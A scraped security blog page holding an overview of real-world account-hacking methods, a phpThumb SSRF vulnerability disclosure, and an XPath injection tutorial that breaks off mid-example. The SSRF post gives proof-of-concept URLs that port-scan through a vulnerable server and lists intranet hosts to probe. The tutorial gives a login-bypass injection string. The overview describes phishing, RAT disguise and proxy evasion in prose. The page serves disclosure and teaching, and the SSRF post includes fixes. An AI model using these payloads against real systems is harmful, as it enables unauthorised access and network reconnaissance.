href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW20uw8T8ysccUKPby8pUltzOvGP9SFROKU-o2mqHEuxLw9FUwB3OsaAAr535b818hL9f3KxihgWtIlfaPNaruznzRxx3X9NVNlCf8tFj19pIEDs2NMnIO2nT2U4oBsNSY23ZIVvbJfVZo/s200/desouze.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW20uw8T8ysccUKPby8pUltzOvGP9SFROKU-o2mqHEuxLw9FUwB3OsaAAr535b818hL9f3KxihgWtIlfaPNaruznzRxx3X9NVNlCf8tFj19pIEDs2NMnIO2nT2U4oBsNSY23ZIVvbJfVZo/s200/desouze.jpg" /></a></div><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">This is a guest post written by , </span><b style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">RAFAEL FONTES SOUZA</b><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">. He is the maintainer of the “</span><b style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">Project Backtrack Team Brazilian</b><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">”, He works at </span><a href="http://services.rafayhackingarticles.net/" style="background-color: white; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-decoration: none;" target="_blank">RHAinfosec </a><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">as a senior penetration tester. He is also the Founder of the "Wikileaks and Intelligence, Cypherpunks". Good communication in groups and the general public, attended college projects with a focus on business organization, he currently seeks work experience outside of brazil”. He frequently contributes at RHA and talks about various topics related to internet security. </span></div>

Understanding This Technique Called MySQL Injection

ABSTRACT It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a...

+ Read more »

An Overview of Real World Account Hacking Strategies

<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC99n6Ei2bimNgq8igV3oQ89haDa4oa8mZbP6dxN9rzUf9xJ5392rkHE4K53EDJfCWyNBnDm8Z-tQjV0zQLKl3i1iz2FDsVyLfS8ktInF1EKkkeI4GBJRxSYiyTE7_jFq5JGBZcUYonLI/s1600/hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC99n6Ei2bimNgq8igV3oQ89haDa4oa8mZbP6dxN9rzUf9xJ5392rkHE4K53EDJfCWyNBnDm8Z-tQjV0zQLKl3i1iz2FDsVyLfS8ktInF1EKkkeI4GBJRxSYiyTE7_jFq5JGBZcUYonLI/s320/hacked.jpg" width="320" /></a></div><br />I often get sick and tired of reading comments underneath a white-hat hacking tutorial, asking “<a href="http://www.rafayhackingarticles.net/2009/08/how-to-hack-gmail.html"><b>how do I hack a Gmail</b></a>”, “<a href="http://www.rafayhackingarticles.net/2009/07/how-to-hack-facebook-account.html"><b>How to hack Facebook account</b></a>”, etc by people that don't really understand the fundamentals of what they are asking. Then there are the RATters, bot masters, and others spreading Trojans with their back-doored, fake Facebook-Hacking programs, that prey on the ignorant people who downloads them.<br /><br />While the “Master Hack” would be to find some insane Zero Day in the web application front end of the website's own servers, attacking them directly and pwning their massive database. That's just not going to happen. Surely not by anyone who has to ask “<b>how to</b>”. I'll tell you why. Google, Yahoo, Facebook (ANY of the big wheels in the cyber world) have entire teams of security specialists, constantly upgrading, monitoring, and researching their entire internal network infrastructure. Nothing connected to a network is ever 100% Secure, though, so I guess if you're a noob you may still have something like a 0.00000001% chance of accidentally finding a way in, before it is found and patched. They also have all the money in the world to ensure they are not running outdated or unsafe SQL versions or rules. Then we come to brute-forcing.. A semi direct attack. Anyone who has (in the last SEVERAL Years) tried guessing a password to an account on any of the big sites more than a few times and locked down the account after so many wrong guesses can quickly ascertain why it wouldn't be wise to throw 50 wrong guesses per second at one.<br /><br /><a name='more'></a><br />I could go on and on about impractical theories and misconceptions, but let's get to the fun part. I will go over how accounts are actually getting hacked into in the real world. This isn't a tutorial. Just an overview of various real world strategies, that don't take much technical know-how. It is more of a cleverness skill-set than a programing one, most of the time.<br /><br />The majority of hacked accounts happen via simply stealing passwords to accounts. Once the attacker has the credentials, there are still often hurdles to overcome, in today's world. Most having to do with the security settings of the website and account, itself.. The attacker may be in a different country, and then the account may automatically lock down and require verification (via SMS, alternate email, etc). Not always, but I promise it does happen quite often. In this case he would have to be careful to use a proxy or vpn that matches the same location as the victim, or perhaps find a tor exit node via AdvOR that is of the same location. But the problem with using freely available proxies, vpns, and exit nodes are that they quickly become blacklisted by spammer usage and get flagged by the website. Also, many of the free proxies have very limited bandwith or restrictions. Most of this can be worked around for a few bucks, though.<br /><br />The methods for stealing creds are far and wide, local and remote, and ever evolving in a war with the ever evolving security industry. The same industry that funds research into hacking their own systems and teaching the world how to break into them, in order to funnel more importance and money into their cause. But the economics and politics are a whole other subject.<br /><h4>PHISHING</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjU6H0U9QEOlsGiK-UxS6ovlCg7rAodpEmjpyXfLGBCZoNU1J6GDVhIfgdrKEyFPu47Jg5fCk5nmQF95OW63VbUD-ZXC84DeDoWcHNVEmPzEiEq0zhUydxYqT4EEhYRvH6KVIp0CjTmpE/s1600/phishing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjU6H0U9QEOlsGiK-UxS6ovlCg7rAodpEmjpyXfLGBCZoNU1J6GDVhIfgdrKEyFPu47Jg5fCk5nmQF95OW63VbUD-ZXC84DeDoWcHNVEmPzEiEq0zhUydxYqT4EEhYRvH6KVIp0CjTmpE/s320/phishing.jpg" width="320" /></a></div><div><br /></div>In this method, the attacker attempts to direct unwary users to a fake login page, usually by spamming the url. Spam urls used to be most prevalently done via massive email lists, but is quickly being replaced by fake accounts on social media sites. Anyone can make a fake account of a pretty girl and get circles of thousands of friends very quickly. Sometimes the victim has malware or a network intrusion that is redirecting them to the malicious page. But either way, the point is, the victim is tricked into visiting a fake page that looks like the real one and if the victim fills out the username and password fields, a php script writes the values to a log on the attacker's server.<br /><br />The usual step-by-step for this technique is by uploading the fake, modified webpage, the script, and log to a web-hosting provider. But they are on the watch for that, these days and most phishing pages are actually being run on an apache server on the attacker's own box, with port 80 forwarded to it from the router and the obfuscated url actually pointing straight to their external ip (I know. Sad but true.), there are others hosted from a paid bullet-proof hosting service.<br /><h4>RATs, Keyloggers, Botnets, Stealers, and Other Trojans</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSr3dsR_GcLR3xTehSPULEO8TZ47r1PaOe6ro40fUevxrNrJsXEnulXPkAd5N-J63IVkxgCZMrqS6Z4qPnrpYiQxRwX8DyMMcKtJf6JM4mbKt9l44MiPf_RJ-mAG8-okKMLhYJeOPkdAI/s1600/How-to-Remove-TrojanWin32BeeVry.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSr3dsR_GcLR3xTehSPULEO8TZ47r1PaOe6ro40fUevxrNrJsXEnulXPkAd5N-J63IVkxgCZMrqS6Z4qPnrpYiQxRwX8DyMMcKtJf6JM4mbKt9l44MiPf_RJ-mAG8-okKMLhYJeOPkdAI/s320/How-to-Remove-TrojanWin32BeeVry.jpg" width="320" /></a></div><div><br /></div>These days, trojans come far and wide with easy to use client interfaces. Most, such as RATs, Consist of a client and a server builder. The server is the malicious exe that will report back to the client via reverse tcp (usually), through the port specified. The server exe can be crypted, have icons, various install options, as well as persistence, process and default browser injection... In other words they can be hard to get rid of for the average user. Once crypted and tested, the server exe is usually binded to some software or the file extension is spoofed with charmap to reverse the characters to make it look like a jpg, then a real jpg is converted to a .ico and used as the icon. They are spread in warez, malicious urls hosting a jdb (Java Drive-By) that tries to execute the code through the browser, and sometimes via a direct client-side attack with an exploit kit or metasploit that attempts to execute the malicious exe via a vulnerability in a program on the victim's box.<br /><br />Once an attacker has r00t, or even user privilege on the victim's machine, the server will report to the client what functions it was designed to do, this can (AND WILL) include keystrokes, screenshots, control of processes on the victim computer, remote desktop, and spy features, such as webcam and mic control (He can watch you and listen to you and save all of it!!!!).<br /><br />Keyloggers, file-stealers, and password-stealers are pretty self explanatory. Usually the malicious exe is built to deliver to an ftp. Sometimes smtp. Botnets are usually specified for only specific functions and are geared more toward mass infection. The client side of a botnet is a builder executable and a control panel run on a local (or remote hosted) server and accessed via a web interface with a common browser.<br /><h4>MITM (Man in the Middle) Attack</h4><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4M-e_ewb9OZKY0c3FzkzFj9EIYZzv54L1IUooRyWpcaKUoKIk7zS72DsbtcK7fyat-TBTszrLgf5lh0h7MyxalDnQyVpZvQ2dIJVCGikVfukxFeClRDRs_8gVJSnFkhEgG7ffULdIt54/s1600/maninthemiddleattack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4M-e_ewb9OZKY0c3FzkzFj9EIYZzv54L1IUooRyWpcaKUoKIk7zS72DsbtcK7fyat-TBTszrLgf5lh0h7MyxalDnQyVpZvQ2dIJVCGikVfukxFeClRDRs_8gVJSnFkhEgG7ffULdIt54/s1600/maninthemiddleattack.jpg" /></a></div><div><br /></div>These attacks are not really geared toward mass-victim hacks... But that is what makes it more scary. I would much rather an attacker have my creds buried among 100,000 others that he has, than someone sitting across the room spending hours reading packets to have me and 3 others' credentials. It is usually more focused on the victim and specified. This is not a rule. It is just how it usually occurs in the real world.<br /><br />In a MITM attack, the attacker is usually running an automated script  that spoofs his MAC address, blocks usage of SSL encryption (via sslstrip, etc), and captures packets between machines. The attacker machine will basically tell the victim machine that he is the router and tell the router that he is the victim machine, and it will then pass along the packets to the destination device, like he was never there. SSL is usually blocked by a script that enforces http only, thus leaving creds passed along the network in plain text. Sometimes a favicon is even added that looks like a lock, so that it gives the impression of a safe, encrypted network protocol. <br /><br />There are many variations to local network attacks. Some try to inject malicious iframes into the victim's browser or other client side attacks. Some don't capture creds or block SSL, but just capture the session cookie, losing access as soon as the victim logs out or it expires. Some even broadcast a fake access point. Most are done in public wifi networks. Some are corporate espionage type attacks, but by far, most are coffee shop/parking lot attacks by bored teenagers running automated scripts on a backtrack or kali linux machine.<br /><h4>The Local Attack </h4>These are typically done by stalkers or nosy friends that find portable, easy to use forensic programs online, put them on a USB stick and play with someone's computer. They look for lots of things, including deleted files. But for this discussion, they look for account passwords saved by the browser of a naive user who doesn't clear his  history, saved form data, passwords, etc.<br /><h4>Guessing</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVKMGbqWKION34ts5Ht1JkIUl6KPNwEa1NTKLScV8akNRsw22otNI8tmZsQ45m59Pfq-8Z-5rJbiIArc8dSG7PQZ5WvsnbjRFZd_fUg2UqmaHkO7m3Vw4w_3k-8UyGBImzAppBtFdvrxo/s1600/300_231539.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVKMGbqWKION34ts5Ht1JkIUl6KPNwEa1NTKLScV8akNRsw22otNI8tmZsQ45m59Pfq-8Z-5rJbiIArc8dSG7PQZ5WvsnbjRFZd_fUg2UqmaHkO7m3Vw4w_3k-8UyGBImzAppBtFdvrxo/s1600/300_231539.jpg" /></a></div><div><br /></div>Hey I know it sounds crazy, but many a social engineer has found answers to security questions in someone's email on social networks, or just asked them in conversations or knew them already, and then reset the passwords to their accounts. Never know.<br /><br />I didn't get into <a href="http://www.rafayhackingarticles.net/search/label/sql%20injection">SQL injection</a> or other hacking on smaller sites and trying the same Creds you find there, onto the big sites, but it happens, too.<br /><br />That concludes my overview of attack strategies that are common-place in the real world. Yes, there are many ways to get into things and many more will evolve. Some of these may be obsolete, in the future. But for the purposes of this discussion, this is how it is actually being done.<br /><br />GJL</div><h4>About the Author</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN9r95rgc1OEDmb1CLZh5KzU6G0cvYKxdquI2w1FtylyLNgYRjOR0SKXce9rVXiw2MQAqgC1ORiUR28yCe-H_WmNCCC8leVkV1RdruCdI6LiwPoSeKVb5n-apTw2ZbwepoIlt5xpgHTeE/s1600/954433_240088456157351_1866033370_n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN9r95rgc1OEDmb1CLZh5KzU6G0cvYKxdquI2w1FtylyLNgYRjOR0SKXce9rVXiw2MQAqgC1ORiUR28yCe-H_WmNCCC8leVkV1RdruCdI6LiwPoSeKVb5n-apTw2ZbwepoIlt5xpgHTeE/s320/954433_240088456157351_1866033370_n.jpg" width="226" /></a></div>I'm Gary. Though I have many names in many places, this is my true one. I am honored to have been invited by the <b>RHA</b> InfoSec to create content. I can't really go all the way into my experience, suffice to say my greatest teachers have been hours upon hours of trial, effort, information and second opinions.<br /><br />My skill-set is wide and varied and I am more a "Jack of all trades", rather than a specialist in any one category. I stay pretty busy with various projects (not all is computer related), but I will do my best to lend my time, effort, and knowledge. If I am busy or unable to answer any of your inquiries or handle your requests, for whatever reason, then I am sure Rafay, or Preston or any of the others can when they are able. Last but not least. I (PERSONALLY) do not want your likes, recognition, attention, traffic, or friends. Please save all of that for Rafay and the <a href="http://facebook.com/rafayhackingarticles" rel="nofollow" target="_blank">RHA Page</a>. These guys have put this together, for you and deserve all recognition for it. Thank you.</div>

An Overview of Real World Account Hacking Strategies

I often get sick and tired of reading comments underneath a white-hat hacking tutorial, asking “ how do I hack a Gmail ”, “ How to hack Face...

+ Read more »

phpThumb Server Side Request Forgery

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiei_lPFPhk43RcLJl08e_gbCbrg4hJ2XHZuQSFabJbkoad0GYYruzQWM9UJrnm40J_wx46gwyKEfMldUnQGGT2FXsk_MkKHeWiHl1havuJ0DWcDgJdWbxpgeR7d78CFqbwOy6Wjg0tIaM/s1600/blackhat_hackers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiei_lPFPhk43RcLJl08e_gbCbrg4hJ2XHZuQSFabJbkoad0GYYruzQWM9UJrnm40J_wx46gwyKEfMldUnQGGT2FXsk_MkKHeWiHl1havuJ0DWcDgJdWbxpgeR7d78CFqbwOy6Wjg0tIaM/s1600/blackhat_hackers.jpg" /></a></div><br />Recently me along with my friend "<b>Deepankar Arora</b>" discovered a server side request forgery vulnerability inside of the phpThumb's latest version. The vulnerability is not inside the script itself, bit it occurs due to the fact that the webmasters do not configure phpThumb properly and also due to the fact that the high security settings were not turned on by default until now, before we talk about the details, let us briefly introduce the readers to SSRF vulnerability.<br /><a name='more'></a><br /><h4>What is a Server Side Request Forgery?</h4>A server side request forgery is not a single vulnerability, however it represents different classes of vulnerability which includes attacks such as XXE, http response splitting etc. In a server side request forgery an attacker creates forged packets to communicate with the intra/internet by using the vulnerable server as a pivot point. Several other different attacks can be performed, however we will keep it at a basic level so that they can be understood easily.<br /><h4>Explanation</h4><br />The debug mode in phpThumb was introduced for trouble shooting purposes, however the debug mode when turned can result in a server side request forgery. By exploiting it a SSRF vulnerability an attacker may be able to scan local or remote ports, fingerprint services etc.<br /><br />Let's take a look at the piece of code responsible for fetching an external image:<br /><blockquote class="tr_bq">if ($rawImageData = phpthumb_functions::SafeURLread($phpThumb->src, $error, $phpThumb->config_http_fopen_timeout,<br />$phpThumb->config_http_follow_redirect)) {<br />        $phpThumb->DebugMessage('SafeURLread('.$phpThumb->src.') succeeded'.($error ? ' with messsages: "'.$error.'"' :<br />''), __FILE__, __LINE__);<br />        $phpThumb->DebugMessage('Setting source data from URL "'.$phpThumb->src.'"', __FILE__, __LINE__);<br />        $phpThumb->setSourceData($rawImageData, urlencode($phpThumb->src));<br />    } else {<br />        $phpThumb->ErrorImage($error);<br />    }<br />}<br /> if ($rawImageData = phpthumb_functions::SafeURLread($_GET['<b>src'</b>], $error, $phpThumb->config_http_fopen_timeout,<br />$phpThumb->config_http_follow_redirect)) {<br />            $md5s = md5($rawImageData);<br />        }</blockquote><br />The above code is responsible for fetching an external image file with the "src" parameter. The code doesn't checks if the image retrieved is actually a valid image i.e. .jpg, .png, .gif etc. Therefore, under debug mode set to "<b>True</b>" it would display the error message received from the lower layer network sockets which would enable an attacker to launch a server side request forgery attack.<br /><br />Furthermore, I noticed that there was a validation being performed for protocols such as <b>file://</b>.<br /><br /><b>if (preg_match('#^(f|ht)tp\://#i', $phpThumb->src)) {</b><br /><br />However, this doesn't prevent this attack completely, as an attacker may be able to leverage other protocols such as gopher://, dict:// etc in order to exploit this vulnerability.<br /><div><br /></div>Scanme.nmap.org has known ports 22, 80 and 25 open, In case where the server errors are turned on, there would be a distinct response by probing open ports vs closed ports.<br /><br /><h4>Proof of Concept</h4><br /><b>http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=<span style="color: red;">http://scanme.nmap.org:22</span>&phpThumbDebug=9 </b>// Open Port  <br /><br /><b>http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=<span style="color: red;">http://scanme.nmap.org:80</span>&phpThumbDebug=9</b> // Open port  <br /><br /><b>http://site.com/phpthumb/phpThumb.php?</b><br /><b>h=32&w=32&src=<span style="color: red;">http://scanme.nmap.org:1337</span>&phpThumbDebug=9 </b>// Closed port<br /><br /><b><u>Probing For Open-Port 80</u></b><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhUGOULWpFoBCGxLZarHdM2BMVkmj0EYJCz_lWMBGrwAsh-NSrw9EMZpo5ns3kJo_YHugzmatt-XKKQcH00OpVFJCvOotM4m94rCupIh8bgj8vXIj-oxLJhpMFomTPirS2vzoPZml59aw/s1600/openport2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhUGOULWpFoBCGxLZarHdM2BMVkmj0EYJCz_lWMBGrwAsh-NSrw9EMZpo5ns3kJo_YHugzmatt-XKKQcH00OpVFJCvOotM4m94rCupIh8bgj8vXIj-oxLJhpMFomTPirS2vzoPZml59aw/s640/openport2.png" width="577" /></a><b><u></u></b><br /><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u><b><u><br /></u></b></u></b><b><u>Probing For An Open-Port 22</u></b>  <br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxz1x3XLPIW-CzOzF9P6krdtY9CqpGmsfDIX4JgWNegHXIdNNRofd80keqCvD4j-g1VWObX9ulopOuen0pUd_7z3LCmuxml2pS2qNtto6eLa6aZY24PpolyuetNEHQyb5ynPnUZ6zsOQ/s1600/openport.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxz1x3XLPIW-CzOzF9P6krdtY9CqpGmsfDIX4JgWNegHXIdNNRofd80keqCvD4j-g1VWObX9ulopOuen0pUd_7z3LCmuxml2pS2qNtto6eLa6aZY24PpolyuetNEHQyb5ynPnUZ6zsOQ/s640/openport.png" width="577" /></a><br /><br /><br /><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><u>Probing For a Closed-Port 1337</u></b><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8AfaeeAivWQZJ41VtrmLs_ZA99cwGa3XcYrjnYQLH3cPobZ7-LWRGJz59ciJbl7eBz7vPGzYqqqbLXiWkg3Hbt-A13qPvN6JqxM8q6TNOgF3XYPqBM5nJKzokll5hhH-lPn1213k8FPk/s1600/closedport.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8AfaeeAivWQZJ41VtrmLs_ZA99cwGa3XcYrjnYQLH3cPobZ7-LWRGJz59ciJbl7eBz7vPGzYqqqbLXiWkg3Hbt-A13qPvN6JqxM8q6TNOgF3XYPqBM5nJKzokll5hhH-lPn1213k8FPk/s640/closedport.png" width="577" /></a><br /><b>SSRF Inside-Out</b><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">In the similar manner an attacker may be able to leverage this attack to scan ports for the intranet. Following are the most common hosts found on the intranet that is worth looking for. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>1)</b> intranet</div><div class="separator" style="clear: both; text-align: left;"><b>2) </b>webmail</div><div class="separator" style="clear: both; text-align: left;"><b>3)</b> jira</div><div class="separator" style="clear: both; text-align: left;"><b>4)</b> helpdesk</div><div class="separator" style="clear: both; text-align: left;"><b>5)</b> bugzilla</div><div class="separator" style="clear: both; text-align: left;"><b>6)</b> localhost</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">In case where the debug mode is disabled, the attacker would receive the following error message:</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbQAmlRYCgSwOhVOFfGY92qTGONQykuYlXtE1V7W4QyVDW9NWzy3v91tFHD0KrXmph8CphZTsZDgVZqX7IHcB9NVpAtCSShzdR2otpR6BRAiTIwD3h7JW4K39gbauLr-qKUf8wf3D5T2w/s1600/phpThumb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbQAmlRYCgSwOhVOFfGY92qTGONQykuYlXtE1V7W4QyVDW9NWzy3v91tFHD0KrXmph8CphZTsZDgVZqX7IHcB9NVpAtCSShzdR2otpR6BRAiTIwD3h7JW4K39gbauLr-qKUf8wf3D5T2w/s640/phpThumb.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>Recommendations</b></div><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both;">It is recommended to turn off the "debug" mode. The debug mode can be modifying by changing the following lines inside the PHP code. </div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><b>"$PHPTHUMB_CONFIG['disable_debug']= <span style="color: red;">false</span>;" </b></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">With: </div><div class="separator" style="clear: both;"><b><br /></b></div><div class="separator" style="clear: both;"><b>"$PHPTHUMB_CONFIG['disable_debug']= <span style="color: red;">true</span>;".</b></div><div class="separator" style="clear: both;"><b><br /></b></div><div class="separator" style="clear: both;"></div><h4>Fix</h4><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><b>1)</b> The authors explicitly disabled all other protocols then http/https/ftp protocols. This minimizes few of the attack vectors.</div><div class="separator" style="clear: both;"><b><br /></b></div><div class="separator" style="clear: both;"><b>https://github.com/JamesHeinrich/phpThumb/commit/457a37d4a22ac9cdbbfe19577376622e58df81b0</b></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"></div><div class="separator" style="clear: both;"><b>2) </b>The debug_mode has been disabled and the "High Security Mode" has been enabled by default in version phpThumb 1.7.12. Take a look at the author's note:</div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rC533MtAQYQiwLNF6sehjTiiU0RssgZTZh5S4MWz1msi4sgQfMR2eG4wbTRgiR5ViDVMlNsGpMvaiTtdZlcyAdLRqEEpP3oBQbamSUpDSjJkd4IjHGrF2TMdCxzXEd5f1av8xwCzLGY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rC533MtAQYQiwLNF6sehjTiiU0RssgZTZh5S4MWz1msi4sgQfMR2eG4wbTRgiR5ViDVMlNsGpMvaiTtdZlcyAdLRqEEpP3oBQbamSUpDSjJkd4IjHGrF2TMdCxzXEd5f1av8xwCzLGY/s640/1.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHeS9c8YSXggfMvaO-CGGJYXMzLGDl-k_sUeU2FDRqfZKdi5lprjQKJ066LPoFtZcrAxVS_Dx5UfMbY5wMMvwBw744i_GwEFl0Io2lxcPEu9uloGwSfvCk9XHCFTSqpmcLvBvL0gaME8M/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHeS9c8YSXggfMvaO-CGGJYXMzLGDl-k_sUeU2FDRqfZKdi5lprjQKJ066LPoFtZcrAxVS_Dx5UfMbY5wMMvwBw744i_GwEFl0Io2lxcPEu9uloGwSfvCk9XHCFTSqpmcLvBvL0gaME8M/s1600/2.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;"><b>3)</b> Further security improvements are to be done in the future versions.</div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">Special thanks to "<b>David Vieira-Kurz</b>" from Majorsecurity for his advice on this issue. </div></div>

phpThumb Server Side Request Forgery

Recently me along with my friend " Deepankar Arora " discovered a server side request forgery vulnerability inside of the phpThumb...

+ Read more »

XPATH Injection Tutorial

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;">XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.<br /><br />We are gonna learn using simple example. Download code from <a href="http://www.4shared.com/zip/SleYPtv8/xpath.html" target="_blank">here</a> & put it in your local server directory.(Code is created by <a href="https://twitter.com/amolnaik4" target="_blank">Amol Naik </a>)<br /><br />Sample XML Document which we gonna use:-<br /><br /><Employees> <br /><!-- Employees Database --> <br />  <Employee ID="1"> <br />    <FirstName>Johnny</FirstName> <br />    <LastName>Bravo</LastName> <br />    <UserName>jbravo</UserName> <br />    <Password>test123</Password> <br />    <Type>Admin</Type> <br />  </Employee> <br />  <Employee ID="2"> <br />    <FirstName>Mark</FirstName> <br />    <LastName>Brown</LastName> <br />    <UserName>mbrown</UserName> <br />    <Password>demopass</Password> <br />    <Type>User</Type> <br />  </Employee> <br />  <Employee ID="3"> <br />    <FirstName>William</FirstName> <br />    <LastName>Gates</LastName> <br />    <UserName>wgates</UserName> <br />    <Password>MSRocks!</Password> <br />    <Type>User</Type> <br />  </Employee> <br />  <Employee ID="4"> <br />    <FirstName>Chris</FirstName> <br />    <LastName>Dawes</LastName> <br />    <UserName>cdawes</UserName> <br />    <Password>letmein</Password> <br />    <Type>User</Type> <br />  </Employee> <br /></Employees> <br /><br /></div><h3 style="text-align: left;">Bypass Authentication:-</h3><div style="text-align: left;"><br />Browse to the login.php page; here we can see simple login form.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB8sxBj2S55WlPZ4mVuBs-Diw_um4SRfFKyWrsXO801LcrukgFkMt1RDQTKWD2vu0R-8p1kRSJ669oOdj-Dp62NlCEVtyAFcwQ8KMn34zUAHHlcHbG1tyJABLHOHEjDkY_B_-o63SiTesx/s1600/login.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypass Authentication" border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB8sxBj2S55WlPZ4mVuBs-Diw_um4SRfFKyWrsXO801LcrukgFkMt1RDQTKWD2vu0R-8p1kRSJ669oOdj-Dp62NlCEVtyAFcwQ8KMn34zUAHHlcHbG1tyJABLHOHEjDkY_B_-o63SiTesx/s320/login.PNG" title="Bypass Authentication" width="320" /></a></div><br />If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:<br /><br />Username: ' or '1' = '1<br />Password:  ' or 